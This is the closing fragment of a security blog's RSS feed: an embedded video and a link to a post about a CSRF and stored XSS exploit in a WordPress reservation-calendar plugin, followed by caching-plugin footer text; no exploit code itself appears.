<p style="text-align: center;"><span class='embed-youtube' style='text-align:center; display: block;'><iframe class='youtube-player' type='text/html' width='1080' height='638' src='https://www.youtube.com/embed/Y6Ip1ptb9No?version=3&#038;rel=1&#038;fs=1&#038;showsearch=0&#038;showinfo=1&#038;iv_load_policy=1&#038;wmode=transparent' frameborder='0' allowfullscreen='true'></iframe></span>
<p>The post <a rel="nofollow" href="/exploit-wordpress-cp-reservation-calendar-1-01-csrf-y-xss-persistent/">Exploit WordPress – CP Reservation Calendar 1.01 CSRF y XSS Persistent.</a> appeared first on <a rel="nofollow" href="/">WebSecurityDev</a>.</p>
]]></content:encoded>
			<wfw:commentRss>https://websecuritydev.com/exploit-wordpress-cp-reservation-calendar-1-01-csrf-y-xss-persistent/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
	</channel>
</rss>

<!-- Performance optimized by W3 Total Cache. Learn more: http://www.w3-edge.com/wordpress-plugins/

Minified using disk
Page Caching using disk: enhanced
Database Caching 13/43 queries in 0.025 seconds using disk
Object Caching 2887/2972 objects using disk

 Served from: websecuritydev.com @ 2015-03-22 02:23:48 by W3 Total Cache -->